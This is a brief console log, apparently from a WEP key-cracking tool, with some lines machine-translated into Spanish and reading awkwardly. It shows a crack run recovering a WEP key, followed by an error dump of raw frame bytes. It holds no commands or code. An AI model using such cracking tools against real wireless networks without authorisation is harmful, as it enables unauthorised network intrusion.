[13:55:08] WEP = 000043621 (crack siguiente en 50000) IV = da: 5a: 00 (tasa = 136)
[13:55:08] Stopping crack PID = 2416
[13:55:08] KEY = (01:23:45:67:89)
Propiedad en 3,60 minutos
[13:55:08] Dying ...
[18:23:49] ERROR retransmite Max (30 bytes): B0 00 FF 7F 00 1A 70 51 B0 70 00 0E 2E C5 81 D3 00 1A 70 51 B0 70 00 00 00 00 01 00 00 00